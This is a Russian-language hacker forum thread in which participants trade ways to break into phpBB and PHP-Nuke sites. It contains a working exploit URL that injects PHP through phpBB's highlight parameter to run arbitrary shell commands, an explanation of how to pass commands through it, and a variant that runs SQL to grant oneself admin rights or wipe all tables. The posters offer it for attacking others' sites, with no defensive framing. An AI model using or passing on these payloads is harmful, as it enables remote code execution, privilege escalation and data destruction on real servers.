Так. Серьезно. Ответь, сколько ты куриш?
Ты зря этим делом занимаешься,
если бы не курил ПЛАН, знал бы что
highlight в phpBB ))

Если ты там стырил пас от MySQL, то теперь делай так
Напиши его в блокнот
Закрой блокнот
Не сохраняй изменения
Забей на пароль

Теперь используй сплойт чтобы выполнить произвольные комманды на уязвимой с-ме!))

Уже писал МИЛИОН раз про highlight.
И ещё напишу
viewtopic.php?xxx=uname -a&t=[TOPIC]&highlight=%2527.system($_GET[xxx]).include%2527

Незабудь вместо [TOPIC] поставить номер топика

Спасибо, неленивый ты
Я некурю))))

Спасибо ))

xxx- эт что?
uname- эт что?

xxx - это параметр в строке в который нужно писать команду, ее запустит system()
uname - это команда nix показывающая версию ОС и другое. с параметром a - версию Linux

Ребята прошу вас объясните мне ламеру, как нужнно взламывать сайты на Phpnuke.
как ни стараюсь не получается. прошу вас помггите.

1. ага... сейчас остались критические уязвимости в нюке 7,5 7,6 ? На секьюрити только XSS и то херь

2. 2KEZ, При создании нюка создаётся профиль базового админа форума (редактирование его параметров запрещено) Всё его данные находятся в бд определённой яцейке (название непоню сейчас точно) Можно ли с помощью

&highlight=%2527.system($_GET[xxx]).include%2527

Очистить данные этой ячейки, тем самым введя supersite.ru/admin.pnp создать по новой базового администратора?

Danke... =)

Какие ячейки? Я тебе про ПЛАН говорил? )) Ладно шучу ))

Вообщем если у тебя есть шелл (HTTP) я незнаю о каких админах ты можешь говорить...
Ты можешь например делать вместо system($_GET[xxx]) mysql_query($_GET[xxx])
и вместо xxx писать SQL команды
Например UPDATE phpbb_users SET user_level=1 WHERE user_id=[ТВОЙ ID]
Или стереть все таблицы...

А phpNuke ТУТ ВООБЩЕ НЕ ПРИ ЧЕМ. Разве что phpBB бывает модулем в нюке.

Занимательно....., Спасибо!